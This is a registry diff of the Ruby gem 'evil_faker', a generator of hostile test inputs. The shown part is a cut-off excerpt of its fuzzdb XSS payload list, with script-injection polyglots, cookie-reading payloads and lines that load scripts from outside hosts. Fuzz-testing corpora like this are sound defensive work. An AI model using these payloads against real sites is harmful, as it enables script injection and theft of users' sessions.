evil_faker 0.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +7 -0
- data/CHANGELOG.md +62 -0
- data/GENERATORS.md +164 -0
- data/LICENSE.txt +21 -0
- data/NOTICE.md +196 -0
- data/README.md +156 -0
- data/Rakefile +12 -0
- data/lib/evil_faker/base.rb +50 -0
- data/lib/evil_faker/data/blns.txt +742 -0
- data/lib/evil_faker/data/groups/blns/emoji/emoji.txt +10 -0
- data/lib/evil_faker/data/groups/blns/emoji/emoticons.txt +12 -0
- data/lib/evil_faker/data/groups/blns/emoji/regional.txt +3 -0
- data/lib/evil_faker/data/groups/blns/exploits/cves.txt +4 -0
- data/lib/evil_faker/data/groups/blns/exploits/human.txt +1 -0
- data/lib/evil_faker/data/groups/blns/exploits/ios.txt +3 -0
- data/lib/evil_faker/data/groups/blns/exploits/irc.txt +1 -0
- data/lib/evil_faker/data/groups/blns/filenames.txt +14 -0
- data/lib/evil_faker/data/groups/blns/injection/command.txt +6 -0
- data/lib/evil_faker/data/groups/blns/injection/file_inclusion.txt +2 -0
- data/lib/evil_faker/data/groups/blns/injection/interpolation.txt +9 -0
- data/lib/evil_faker/data/groups/blns/injection/jinja2.txt +2 -0
- data/lib/evil_faker/data/groups/blns/injection/script.txt +236 -0
- data/lib/evil_faker/data/groups/blns/injection/server_code.txt +9 -0
- data/lib/evil_faker/data/groups/blns/injection/sql.txt +8 -0
- data/lib/evil_faker/data/groups/blns/injection/xxe.txt +1 -0
- data/lib/evil_faker/data/groups/blns/numeric/numeric.txt +71 -0
- data/lib/evil_faker/data/groups/blns/numeric/unicode_numbers.txt +2 -0
- data/lib/evil_faker/data/groups/blns/profanity.txt +22 -0
- data/lib/evil_faker/data/groups/blns/reserved.txt +19 -0
- data/lib/evil_faker/data/groups/blns/rtl.txt +7 -0
- data/lib/evil_faker/data/groups/blns/terminal.txt +3 -0
- data/lib/evil_faker/data/groups/blns/unicode/accents.txt +4 -0
- data/lib/evil_faker/data/groups/blns/unicode/bom.txt +2 -0
- data/lib/evil_faker/data/groups/blns/unicode/controls.txt +3 -0
- data/lib/evil_faker/data/groups/blns/unicode/font.txt +8 -0
- data/lib/evil_faker/data/groups/blns/unicode/lowercase.txt +2 -0
- data/lib/evil_faker/data/groups/blns/unicode/quotes.txt +11 -0
- data/lib/evil_faker/data/groups/blns/unicode/scripts.txt +2 -0
- data/lib/evil_faker/data/groups/blns/unicode/special.txt +4 -0
- data/lib/evil_faker/data/groups/blns/unicode/symbols.txt +12 -0
- data/lib/evil_faker/data/groups/blns/unicode/trick.txt +5 -0
- data/lib/evil_faker/data/groups/blns/unicode/two_byte.txt +10 -0
- data/lib/evil_faker/data/groups/blns/unicode/upsidedown.txt +2 -0
- data/lib/evil_faker/data/groups/blns/unicode/whitespace.txt +1 -0
- data/lib/evil_faker/data/groups/blns/zalgo.txt +5 -0
- data/lib/evil_faker/data/groups/fuzzdb/email/invalid.txt +26 -0
- data/lib/evil_faker/data/groups/fuzzdb/email/valid.txt +32 -0
- data/lib/evil_faker/data/groups/fuzzdb/emoji/emoji.txt +8 -0
- data/lib/evil_faker/data/groups/fuzzdb/emoji/emoticons.txt +11 -0
- data/lib/evil_faker/data/groups/fuzzdb/emoji/regional.txt +3 -0
- data/lib/evil_faker/data/groups/fuzzdb/exploits/ios.txt +1 -0
- data/lib/evil_faker/data/groups/fuzzdb/headers/mimetypes.txt +1864 -0
- data/lib/evil_faker/data/groups/fuzzdb/headers/protocol.txt +357 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/command.txt +1115 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/directory_traversal.txt +536 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/file_inclusion.txt +906 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/file_upload_bypass.txt +371 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/format_strings.txt +67 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/generic.txt +584 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/integer_overflow.txt +12 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/json.txt +89 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/ldap.txt +35 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/magic_hashes.txt +24 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/nosql.txt +17 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/open_redirect.txt +37 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/rfi.txt +2241 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/script.txt +930 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/server_side_include.txt +78 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/source_disclosure.txt +18 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/sql.txt +661 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/ssrf.txt +56 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/type_confusion.txt +329 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/xpath.txt +13 -0
- data/lib/evil_faker/data/groups/fuzzdb/injection/xxe.txt +65 -0
- data/lib/evil_faker/data/groups/fuzzdb/routes/debug_params.txt +157 -0
- data/lib/evil_faker/data/groups/fuzzdb/routes/directory_indexing.txt +15 -0
- data/lib/evil_faker/data/groups/fuzzdb/routes/local_paths.txt +26 -0
- data/lib/evil_faker/data/groups/fuzzdb/rtl.txt +5 -0
- data/lib/evil_faker/data/groups/fuzzdb/terminal.txt +3 -0
- data/lib/evil_faker/data/groups/fuzzdb/unicode/bad_chars.txt +15 -0
- data/lib/evil_faker/data/groups/fuzzdb/unicode/special.txt +31 -0
- data/lib/evil_faker/data/groups/fuzzdb/unicode/trick.txt +5 -0
- data/lib/evil_faker/data/groups/fuzzdb/unicode/two_byte.txt +9 -0
- data/lib/evil_faker/data/groups/fuzzdb/unicode/upsidedown.txt +2 -0
- data/lib/evil_faker/data/groups/intruder_payloads/filenames.txt +124 -0
- data/lib/evil_faker/data/groups/intruder_payloads/injection/command.txt +445 -0
- data/lib/evil_faker/data/groups/intruder_payloads/injection/directory_traversal.txt +2578 -0
- data/lib/evil_faker/data/groups/intruder_payloads/injection/file_inclusion.txt +698 -0
- data/lib/evil_faker/data/groups/intruder_payloads/injection/generic.txt +1401 -0
- data/lib/evil_faker/data/groups/intruder_payloads/injection/overflow.txt +36 -0
- data/lib/evil_faker/data/groups/intruder_payloads/injection/script.txt +61 -0
- data/lib/evil_faker/data/groups/intruder_payloads/injection/server_side_include.txt +18 -0
- data/lib/evil_faker/data/groups/intruder_payloads/injection/sql.txt +753 -0
- data/lib/evil_faker/data/groups/intruder_payloads/injection/xxe.txt +66 -0
- data/lib/evil_faker/data/groups/intruder_payloads/unicode/bad_chars.txt +1 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/headers/cache_deception.txt +1125 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/command.txt +496 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/directory_traversal.txt +22607 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/file_inclusion.txt +4787 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/ldap.txt +60 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/nosql.txt +26 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/open_redirect.txt +305 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/script.txt +2165 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/sql.txt +1354 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/ssti.txt +105 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/injection/xxe.txt +102 -0
- data/lib/evil_faker/data/groups/payloads_all_the_things/routes/admin_interfaces.txt +52 -0
- data/lib/evil_faker/groups/email.rb +11 -0
- data/lib/evil_faker/groups/emoji.rb +12 -0
- data/lib/evil_faker/groups/exploits.rb +13 -0
- data/lib/evil_faker/groups/filenames.rb +8 -0
- data/lib/evil_faker/groups/headers.rb +12 -0
- data/lib/evil_faker/groups/injection.rb +35 -0
- data/lib/evil_faker/groups/numeric.rb +11 -0
- data/lib/evil_faker/groups/profanity.rb +8 -0
- data/lib/evil_faker/groups/reserved.rb +8 -0
- data/lib/evil_faker/groups/routes.rb +13 -0
- data/lib/evil_faker/groups/rtl.rb +8 -0
- data/lib/evil_faker/groups/terminal.rb +8 -0
- data/lib/evil_faker/groups/unicode.rb +23 -0
- data/lib/evil_faker/groups/zalgo.rb +8 -0
- data/lib/evil_faker/source_base.rb +30 -0
- data/lib/evil_faker/sources/blns.rb +8 -0
- data/lib/evil_faker/sources/fuzzdb.rb +8 -0
- data/lib/evil_faker/sources/intruder_payloads.rb +8 -0
- data/lib/evil_faker/sources/payloads_all_the_things.rb +8 -0
- data/lib/evil_faker/version.rb +5 -0
- data/lib/evil_faker.rb +13 -0
- data/scripts/blns_build_corpus.rb +159 -0
- data/scripts/fuzzdb_build_corpus.rb +166 -0
- data/scripts/generate_namespaces.rb +87 -0
- data/scripts/intruder_payloads_build_corpus.rb +112 -0
- data/scripts/payloads_all_the_things_build_corpus.rb +74 -0
- data/sig/evil_faker.rbs +4 -0
- metadata +181 -0
|
@@ -0,0 +1,930 @@
|
|
|
1
|
+
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
|
|
2
|
+
/*-/*`/*\`/*'/*"/**/
|
|
3
|
+
(/* */oNcliCk=alert() )
|
|
4
|
+
//%0D%0A%0D%0A//
|
|
5
|
+
</stYle/</titLe/</teXtarEa/</scRipt/--!>
|
|
6
|
+
\x3csVg/<sVg/oNloAd=alert()//>\x3e
|
|
7
|
+
<input type='text' value='jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'></input>
|
|
8
|
+
<input type=text value=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e></input>
|
|
9
|
+
<img border=3 alt=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e>
|
|
10
|
+
<a href="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e">click me</a>
|
|
11
|
+
<math xlink:href="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e">click me</math>
|
|
12
|
+
<iframe src="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"></iframe>
|
|
13
|
+
<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e-->
|
|
14
|
+
<style>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</style>
|
|
15
|
+
<textarea>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</textarea>
|
|
16
|
+
<div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>
|
|
17
|
+
var str = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";
|
|
18
|
+
var str = 'jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e';
|
|
19
|
+
<script>//jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</script>
|
|
20
|
+
<script>/*jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e*/</script>
|
|
21
|
+
</script><script src="https://static.jsbin.com/js/render/edit.js?3.35.11"></script><script>jsbinShowEdit && jsbinShowEdit({"static":"https://static.jsbin.com","root":"https://jsbin.com"});</script><script>
|
|
22
|
+
setTimeout(location.search.slice(1));
|
|
23
|
+
jaVasCript:/-/%60/%5C%60/'/%22//(/%20*/oNcliCk=alert()%20)//%250D%250A%250D%250A//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%3CsVg/%3CsVg/oNloAd=alert()//%3E%3E
|
|
24
|
+
var data = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";document.documentElement.innerHTML = data;
|
|
25
|
+
var data = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";document.head.outerHTML = data;
|
|
26
|
+
var data = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";document.write(data);document.close();
|
|
27
|
+
<
|
|
28
|
+
%3C
|
|
29
|
+
%253C
|
|
30
|
+
%25253C
|
|
31
|
+
<
|
|
32
|
+
<
|
|
33
|
+
<
|
|
34
|
+
<
|
|
35
|
+
<
|
|
36
|
+
<
|
|
37
|
+
<
|
|
38
|
+
<
|
|
39
|
+
<
|
|
40
|
+
<
|
|
41
|
+
<
|
|
42
|
+
<
|
|
43
|
+
<
|
|
44
|
+
<
|
|
45
|
+
<
|
|
46
|
+
<
|
|
47
|
+
<
|
|
48
|
+
<
|
|
49
|
+
<
|
|
50
|
+
<
|
|
51
|
+
<
|
|
52
|
+
<
|
|
53
|
+
<
|
|
54
|
+
<
|
|
55
|
+
<
|
|
56
|
+
<
|
|
57
|
+
<
|
|
58
|
+
<
|
|
59
|
+
<
|
|
60
|
+
<
|
|
61
|
+
<
|
|
62
|
+
<
|
|
63
|
+
<
|
|
64
|
+
<
|
|
65
|
+
<
|
|
66
|
+
<
|
|
67
|
+
<
|
|
68
|
+
<
|
|
69
|
+
<
|
|
70
|
+
<
|
|
71
|
+
<
|
|
72
|
+
<
|
|
73
|
+
<
|
|
74
|
+
<
|
|
75
|
+
<
|
|
76
|
+
<
|
|
77
|
+
<
|
|
78
|
+
<
|
|
79
|
+
<
|
|
80
|
+
<
|
|
81
|
+
<
|
|
82
|
+
<
|
|
83
|
+
<
|
|
84
|
+
<
|
|
85
|
+
<
|
|
86
|
+
<
|
|
87
|
+
<
|
|
88
|
+
<
|
|
89
|
+
<
|
|
90
|
+
<
|
|
91
|
+
<
|
|
92
|
+
<
|
|
93
|
+
<
|
|
94
|
+
<
|
|
95
|
+
\x3c
|
|
96
|
+
\x3C
|
|
97
|
+
\u003c
|
|
98
|
+
\u003C
|
|
99
|
+
onAbort
|
|
100
|
+
onBlur
|
|
101
|
+
onChange
|
|
102
|
+
onClick
|
|
103
|
+
onDblClick
|
|
104
|
+
onDragDrop
|
|
105
|
+
onError
|
|
106
|
+
onFocus
|
|
107
|
+
onKeyDown
|
|
108
|
+
onKeyPress
|
|
109
|
+
onKeyUp
|
|
110
|
+
onLoad
|
|
111
|
+
onMouseDown
|
|
112
|
+
onMouseMove
|
|
113
|
+
onMouseOut
|
|
114
|
+
onMouseOver
|
|
115
|
+
onMouseUp
|
|
116
|
+
onMove
|
|
117
|
+
onReset
|
|
118
|
+
onResize
|
|
119
|
+
onSelect
|
|
120
|
+
onSubmit
|
|
121
|
+
onabort
|
|
122
|
+
onactivate
|
|
123
|
+
onafterprint
|
|
124
|
+
onafterupdate
|
|
125
|
+
onanimationend
|
|
126
|
+
onanimationiteration
|
|
127
|
+
onanimationstart
|
|
128
|
+
onautocomplete
|
|
129
|
+
onautocompleteerror
|
|
130
|
+
onbeforeactivate
|
|
131
|
+
onbeforecopy
|
|
132
|
+
onbeforecut
|
|
133
|
+
onbeforedeactivate
|
|
134
|
+
onbeforeeditfocus
|
|
135
|
+
onbeforepaste
|
|
136
|
+
onbeforeprint
|
|
137
|
+
onbeforeunload
|
|
138
|
+
onbeforeupdate
|
|
139
|
+
onbegin
|
|
140
|
+
onblur
|
|
141
|
+
onbounce
|
|
142
|
+
oncancel
|
|
143
|
+
oncanplay
|
|
144
|
+
oncanplaythrough
|
|
145
|
+
oncellchange
|
|
146
|
+
onchange
|
|
147
|
+
onclick
|
|
148
|
+
onclose
|
|
149
|
+
oncompassneedscalibration
|
|
150
|
+
oncontextmenu
|
|
151
|
+
oncontrolselect
|
|
152
|
+
oncopy
|
|
153
|
+
oncuechange
|
|
154
|
+
oncut
|
|
155
|
+
ondataavailable
|
|
156
|
+
ondatasetchanged
|
|
157
|
+
ondatasetcomplete
|
|
158
|
+
ondblclick
|
|
159
|
+
ondeactivate
|
|
160
|
+
ondevicelight
|
|
161
|
+
ondevicemotion
|
|
162
|
+
ondeviceorientation
|
|
163
|
+
ondeviceproximity
|
|
164
|
+
ondrag
|
|
165
|
+
ondragdrop
|
|
166
|
+
ondragend
|
|
167
|
+
ondragenter
|
|
168
|
+
ondragexit
|
|
169
|
+
ondragleave
|
|
170
|
+
ondragover
|
|
171
|
+
ondragstart
|
|
172
|
+
ondrop
|
|
173
|
+
ondurationchange
|
|
174
|
+
onemptied
|
|
175
|
+
onend
|
|
176
|
+
onended
|
|
177
|
+
onerror
|
|
178
|
+
onerrorupdate
|
|
179
|
+
onexit
|
|
180
|
+
onfilterchange
|
|
181
|
+
onfinish
|
|
182
|
+
onfocus
|
|
183
|
+
onfocusin
|
|
184
|
+
onfocusout
|
|
185
|
+
onformchange
|
|
186
|
+
onforminput
|
|
187
|
+
ongesturechange
|
|
188
|
+
ongestureend
|
|
189
|
+
ongesturestart
|
|
190
|
+
onhashchange
|
|
191
|
+
onhelp
|
|
192
|
+
oninput
|
|
193
|
+
oninvalid
|
|
194
|
+
onkeydown
|
|
195
|
+
onkeypress
|
|
196
|
+
onkeyup
|
|
197
|
+
onlanguagechange
|
|
198
|
+
onlayoutcomplete
|
|
199
|
+
onload
|
|
200
|
+
onloadeddata
|
|
201
|
+
onloadedmetadata
|
|
202
|
+
onloadstart
|
|
203
|
+
onlosecapture
|
|
204
|
+
onmediacomplete
|
|
205
|
+
onmediaerror
|
|
206
|
+
onmessage
|
|
207
|
+
onmousedown
|
|
208
|
+
onmouseenter
|
|
209
|
+
onmouseleave
|
|
210
|
+
onmousemove
|
|
211
|
+
onmouseout
|
|
212
|
+
onmouseover
|
|
213
|
+
onmouseup
|
|
214
|
+
onmousewheel
|
|
215
|
+
onmove
|
|
216
|
+
onmoveend
|
|
217
|
+
onmovestart
|
|
218
|
+
onmozfullscreenchange
|
|
219
|
+
onmozfullscreenerror
|
|
220
|
+
onmozpointerlockchange
|
|
221
|
+
onmozpointerlockerror
|
|
222
|
+
onmsgesturechange
|
|
223
|
+
onmsgesturedoubletap
|
|
224
|
+
onmsgesturehold
|
|
225
|
+
onmsgesturerestart
|
|
226
|
+
onmsinertiastart
|
|
227
|
+
onmspointercancel
|
|
228
|
+
onmspointerdown
|
|
229
|
+
onmspointerenter
|
|
230
|
+
onmspointerhover
|
|
231
|
+
onmspointerleave
|
|
232
|
+
onmspointermove
|
|
233
|
+
onmspointerout
|
|
234
|
+
onmspointerover
|
|
235
|
+
onmspointerup
|
|
236
|
+
onoffline
|
|
237
|
+
ononline
|
|
238
|
+
onorientationchange
|
|
239
|
+
onoutofsync
|
|
240
|
+
onpagehide
|
|
241
|
+
onpageshow
|
|
242
|
+
onpaste
|
|
243
|
+
onpause
|
|
244
|
+
onplay
|
|
245
|
+
onplaying
|
|
246
|
+
onpopstate
|
|
247
|
+
onprogress
|
|
248
|
+
onpropertychange
|
|
249
|
+
onratechange
|
|
250
|
+
onreadystatechange
|
|
251
|
+
onreceived
|
|
252
|
+
onrepeat
|
|
253
|
+
onreset
|
|
254
|
+
onresize
|
|
255
|
+
onresizeend
|
|
256
|
+
onresizestart
|
|
257
|
+
onresume
|
|
258
|
+
onreverse
|
|
259
|
+
onrowdelete
|
|
260
|
+
onrowenter
|
|
261
|
+
onrowexit
|
|
262
|
+
onrowinserted
|
|
263
|
+
onrowsdelete
|
|
264
|
+
onrowsinserted
|
|
265
|
+
onscroll
|
|
266
|
+
onsearch
|
|
267
|
+
onseek
|
|
268
|
+
onseeked
|
|
269
|
+
onseeking
|
|
270
|
+
onselect
|
|
271
|
+
onselectionchange
|
|
272
|
+
onselectstart
|
|
273
|
+
onshow
|
|
274
|
+
onstalled
|
|
275
|
+
onstart
|
|
276
|
+
onstop
|
|
277
|
+
onstorage
|
|
278
|
+
onsubmit
|
|
279
|
+
onsuspend
|
|
280
|
+
onsynchrestored
|
|
281
|
+
ontimeerror
|
|
282
|
+
ontimeupdate
|
|
283
|
+
ontoggle
|
|
284
|
+
ontouchcancel
|
|
285
|
+
ontouchend
|
|
286
|
+
ontouchmove
|
|
287
|
+
ontouchstart
|
|
288
|
+
ontrackchange
|
|
289
|
+
ontransitionend
|
|
290
|
+
onunload
|
|
291
|
+
onurlflip
|
|
292
|
+
onuserproximity
|
|
293
|
+
onvolumechange
|
|
294
|
+
onwaiting
|
|
295
|
+
onwebkitanimationend
|
|
296
|
+
onwebkitanimationiteration
|
|
297
|
+
onwebkitanimationstart
|
|
298
|
+
onwebkitmouseforcechanged
|
|
299
|
+
onwebkitmouseforcedown
|
|
300
|
+
onwebkitmouseforceup
|
|
301
|
+
onwebkitmouseforcewillbegin
|
|
302
|
+
onwebkittransitionend
|
|
303
|
+
onwebkitwillrevealbottom
|
|
304
|
+
onwheel
|
|
305
|
+
onzoom
|
|
306
|
+
'
|
|
307
|
+
<font style='color:expression(alert('XSS'))'>
|
|
308
|
+
' onmouseover=alert(/Black.Spook/)
|
|
309
|
+
' or 2=2
|
|
310
|
+
"
|
|
311
|
+
" or 202
|
|
312
|
+
";eval(unescape(location))//# %0Aalert(0)
|
|
313
|
+
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
|
314
|
+
"><iframe%20src="http://google.com"%%203E
|
|
315
|
+
"><img src=x onerror=prompt(1);>
|
|
316
|
+
"><img src=x onerror=window.open('https://www.google.com/');>
|
|
317
|
+
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
|
|
318
|
+
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
|
|
319
|
+
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
|
|
320
|
+
alert(1)
|
|
321
|
+
&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
|
|
322
|
+
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
|
|
323
|
+
&#39;&#88;&#83;&#83;&#39;&#41;>
|
|
324
|
+
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
|
325
|
+
<img src=x:x onerror=alert(1)>
|
|
326
|
+
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
|
|
327
|
+
<SCRIPT SRC=//xss.rocks/.j>
|
|
328
|
+
'); alert('XSS
|
|
329
|
+
\";alert('XSS');//
|
|
330
|
+
<%<!--'%><script>alert(1);</script -->
|
|
331
|
+
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
|
|
332
|
+
<--`<img/src=` onerror=alert(1)> --!>
|
|
333
|
+
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
|
334
|
+
<<scr\0ipt/src=http://xss.com/xss.js></script
|
|
335
|
+
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
|
336
|
+
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
|
|
337
|
+
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
|
338
|
+
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
|
339
|
+
<a href="javascript:\u0061le%72t(1)"><button>
|
|
340
|
+
<a href="jAvAsCrIpT:alert(1)">X</a>
|
|
341
|
+
<a href=javascript:alert(document.cookie)>Click Here</a>
|
|
342
|
+
<a onmouseover="alert(document.cookie)">xxs link</a>
|
|
343
|
+
<a onmouseover=alert(document.cookie)>xxs link</a>
|
|
344
|
+
<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
|
|
345
|
+
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>
|
|
346
|
+
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
|
347
|
+
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b 